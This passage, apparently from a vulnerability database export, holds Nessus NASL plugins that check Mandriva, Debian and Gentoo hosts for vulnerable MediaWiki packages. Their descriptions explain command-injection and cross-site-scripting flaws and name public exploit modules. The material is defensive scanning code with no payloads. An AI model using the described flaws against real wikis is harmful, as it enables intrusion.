review also discovered similar logic in the PdfHandler\nextension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 1.22.3 does not block unsafe namespaces, such as a\nW3C XHTML namespace, in uploaded SVG files. Some client software may\nuse these namespaces in a way that results in XSS. This was fixed by\ndisallowing uploading SVG files using non-whitelisted namespaces\n(CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be\nvulnerable to timing attacks. This was fixed by making token\ncomparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS\nattacks, due to flaw with link handling in api.php. This was fixed\nsuch that it won't find links in the middle of api.php links\n(CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these\nissues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions\nhave been updated to newer versions that are compatible with MediaWiki\n1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due\nto the fact that it is unmaintained upstream and is vulnerable to\ncross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to\nsupport multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0113.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0124.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-ldapauthentication-2.0f-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-mysql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-pgsql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-sqlite-1.22.3-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:07:04", "description": "According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed\n to the 'Sanitizer::checkCss' class, which allows a\n remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the\n 'XmlTypeCheck.php' script in uploaded SVG files that\n contain external style sheets, which allows a remote\n attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback()\n function is bypassed in the 'UploadBase.php' script\n when an SVG file with invalid XML is uploaded. This\n can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php'\n script when input is submitted to the '-o-link'\n attribute, which allows cross-site scripting attacks in\n Opera 12. (CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the\n log API, Enhanced Recent Changes feature, and users'\n watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but\nare not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a\n cross-site scripting vulnerability due to the lack of\n input validation of the 'data-videopayload' attribute\n in the 'mw.PopUpThumbVideo.js' script. (CVE-2013-4574)\n\n - The Scribuntu extension is affected by a NULL pointer\n dereference and buffer overflow flaw in the\n implementation of the 'luasandbox' PHP extension that\n can lead to a denial of service or arbitrary code\n execution. (CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information\n disclosure vulnerability due to the insertion of a\n username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site\n request forgery (XSRF) vulnerability due to the lack of\n token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead\nrelied on the application's self-reported version number.", "edition": 28, "published": "2014-02-06T00:00:00", "title": "MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4574", "CVE-2013-4571", "CVE-2013-6455", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-3454", "CVE-2013-4570", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2014-02-06T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_19_10.NASL", "href": "https://www.tenable.com/plugins/nessus/72370", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72370);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2013-4570\",\n \"CVE-2013-4571\",\n \"CVE-2013-4574\",\n \"CVE-2013-6451\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6455\",\n \"CVE-2013-6472\",\n \"CVE-2014-3454\"\n );\n script_bugtraq_id(64966, 65003, 67522);\n\n script_name(english:\"MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MediaWiki.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed\n to the 'Sanitizer::checkCss' class, which allows a\n remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the\n 'XmlTypeCheck.php' script in uploaded SVG files that\n contain external style sheets, which allows a remote\n attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback()\n function is bypassed in the 'UploadBase.php' script\n when an SVG file with invalid XML is uploaded. This\n can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php'\n script when input is submitted to the '-o-link'\n attribute, which allows cross-site scripting attacks in\n Opera 12. (CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the\n log API, Enhanced Recent Changes feature, and users'\n watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but\nare not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a\n cross-site scripting vulnerability due to the lack of\n input validation of the 'data-videopayload' attribute\n in the 'mw.PopUpThumbVideo.js' script. (CVE-2013-4574)\n\n - The Scribuntu extension is affected by a NULL pointer\n dereference and buffer overflow flaw in the\n implementation of the 'luasandbox' PHP extension that\n can lead to a denial of service or arbitrary code\n execution. (CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information\n disclosure vulnerability due to the insertion of a\n username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site\n request forgery (XSRF) vulnerability due to the lack of\n token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead\nrelied on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11acd3f1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.20#MediaWiki_1.21.4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.10 / 1.21.4 / 1.22.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-6453\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.[0-9]([^0-9]|$)\" ||\n version =~ \"^1\\.21\\.[0-3]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.10 / 1.21.4 / 1.22.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:48:24", "description": "The remote Debian host is missing a security update. It is, therefore,\naffected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to\n a failure to validate input before returning it to the\n user. An unauthenticated, remote attacker can exploit\n this, via specially crafted SVG files, to execute\n arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to\n two different tools being used to block password change\n requests, these being Special:PasswordReset and\n Special:ChangePassword, either of which may be bypassed\n by the method the other prevents. A remote attacker can\n exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit these to\n bypass the blacklist. (CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the\n same session ID within HTTP headers. A remote attacker\n can exploit this to authenticate as another random\n user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the\n /includes/libs/XmlTypeCheck.php script due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted XSL file, to execute arbitrary script code in\n the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php\n script due to a failure to apply SVG sanitization when\n XML files are read as invalid. An unauthenticated,\n remote attacker can exploit this to upload non-sanitized\n XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site (XSS) scripting vulnerability exists\n in the /includes/Sanitizer.php script due to a failure\n to properly validate the '-o-link' attribute before\n returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in the user's\n browser session. (CVE-2013-6454)\n\n - A flaw exists in the log API within the\n /includes/api/ApiQueryLogEvents.php script that allows\n an unauthenticated, remote attacker to disclose\n potentially sensitive information regarding deleted\n pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php,\n DjVu.php, Bitmap.php, and ImageHandler.php scripts when\n DjVu or PDF file upload support is enabled due to\n improper sanitization of user-supplied input. An\n authenticated, remote attacker can exploit these, via\n the use of shell metacharacters, to execute execute\n arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n in the includes/specials/SpecialChangePassword.php\n script due to a failure to properly handle a correctly\n authenticated but unintended login attempt. An\n unauthenticated, remote attacker, by convincing a user\n to follow a specially crafted link, can exploit this to\n reset the user's password. (CVE-2014-2665)", "edition": 15, "published": "2014-03-31T00:00:00", "title": "Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-2032", "CVE-2013-4572"], "modified": "2014-03-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mediawiki-extensions", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:mediawiki"], "id": "DEBIAN_DSA-2891.NASL", "href": "https://www.tenable.com/plugins/nessus/73256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were\n# extracted from Debian Security Advisory DSA-2891\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73256);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\n \"CVE-2013-2031\",\n \"CVE-2013-2032\",\n \"CVE-2013-4567\",\n \"CVE-2013-4568\",\n \"CVE-2013-4572\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6472\",\n \"CVE-2014-1610\",\n \"CVE-2014-2665\"\n );\n script_bugtraq_id(\n 59594,\n 59595,\n 63757,\n 63760,\n 63761,\n 65003,\n 65223,\n 66600\n );\n script_xref(name:\"DSA\", value:\"2891\");\n\n script_name(english:\"Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities\");\n script_summary(english:\"Checks the dpkg output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian host is missing a security update. It is, therefore,\naffected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to\n a failure to validate input before returning it to the\n user. An unauthenticated, remote attacker can exploit\n this, via specially crafted SVG files, to execute\n arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to\n two different tools being used to block password change\n requests, these being Special:PasswordReset and\n Special:ChangePassword, either of which may be bypassed\n by the method the other prevents. A remote attacker can\n exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit these to\n bypass the blacklist. (CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the\n same session ID within HTTP headers. A remote attacker\n can exploit this to authenticate as another random\n user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the\n /includes/libs/XmlTypeCheck.php script due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted XSL file, to execute arbitrary script code in\n the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php\n script due to a failure to apply SVG sanitization when\n XML files are read as invalid. An unauthenticated,\n remote attacker can exploit this to upload non-sanitized\n XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site (XSS) scripting vulnerability exists\n in the /includes/Sanitizer.php script due to a failure\n to properly validate the '-o-link' attribute before\n returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in the user's\n browser session. (CVE-2013-6454)\n\n - A flaw exists in the log API within the\n /includes/api/ApiQueryLogEvents.php script that allows\n an unauthenticated, remote attacker to disclose\n potentially sensitive information regarding deleted\n pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php,\n DjVu.php, Bitmap.php, and ImageHandler.php scripts when\n DjVu or PDF file upload support is enabled due to\n improper sanitization of user-supplied input. An\n authenticated, remote attacker can exploit these, via\n the use of shell metacharacters, to execute execute\n arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n in the includes/specials/SpecialChangePassword.php\n script due to a failure to properly handle a correctly\n authenticated but unintended login attempt. An\n unauthenticated, remote attacker, by convincing a user\n to follow a specially crafted link, can exploit this to\n reset the user's password. (CVE-2014-2665)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729629\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706601\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4567\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6452\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6453\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6454\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6472\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-1610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-2665\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/mediawiki\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/mediawiki-extensions\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.debian.org/security/2014/dsa-2891\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the mediawiki packages. For the stable distribution (wheezy),\nthese issues have been fixed in version 1:1.19.14+dfsg-0+deb7u1 of the\nmediawiki package and version 3.5~deb7u1 of the mediawiki-extensions\npackage.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item(\"Host/Debian/release\"); \nif (empty_or_null(oslevel)) audit(AUDIT_OS_NOT, \"Debian\");\nif (oslevel !~ \"^7\\.\") audit(AUDIT_OS_NOT, \"Debian 7\", \"Debian \" + oslevel);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.14+dfsg-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-base\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-collection\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-geshi\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-graphviz\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-ldapauth\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-openid\", reference:\"3.5~deb7u1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n xss : TRUE,\n xsrf : TRUE,\n extra : deb_report_get()\n );\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:04:25", "description": "The remote host is affected by the vulnerability described in GLSA-201502-04\n(MediaWiki: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. Please\n review the CVE identifiers and MediaWiki announcement referenced below\n for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process, create a Denial of Service condition, obtain\n sensitive information, bypass security restrictions, and inject arbitrary\n web script or HTML.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-02-09T00:00:00", "title": "GLSA-201502-04 : MediaWiki: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9476", "CVE-2014-9479", "CVE-2014-2244", "CVE-2014-9477", "CVE-2014-5243", "CVE-2014-5241", "CVE-2014-2242", "CVE-2014-9487", "CVE-2014-5242", "CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2014-9277", "CVE-2013-6472", "CVE-2014-9481", "CVE-2014-2243", "CVE-2014-9475", "CVE-2014-9507", "CVE-2013-6452", "CVE-2014-9478", "CVE-2014-2665", "CVE-2014-9276", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295", "CVE-2014-9480"], "modified": "2015-02-09T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mediawiki"], "id": "GENTOO_GLSA-201502-04.NASL", "href": "https://www.tenable.com/plugins/nessus/81227", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201502-04.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81227);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\", \"CVE-2014-2665\", \"CVE-2014-2853\", \"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-7199\", \"CVE-2014-7295\", \"CVE-2014-9276\", \"CVE-2014-9277\", \"CVE-2014-9475\", \"CVE-2014-9476\", \"CVE-2014-9477\", \"CVE-2014-9478\", \"CVE-2014-9479\", \"CVE-2014-9480\", \"CVE-2014-9481\", \"CVE-2014-9487\", \"CVE-2014-9507\");\n script_xref(name:\"GLSA\", value:\"201502-04\");\n\n script_name(english:\"GLSA-201502-04 : MediaWiki: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201502-04\n(MediaWiki: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. Please\n review the CVE identifiers and MediaWiki announcement referenced below\n for details.\n \nImpact :\n\n 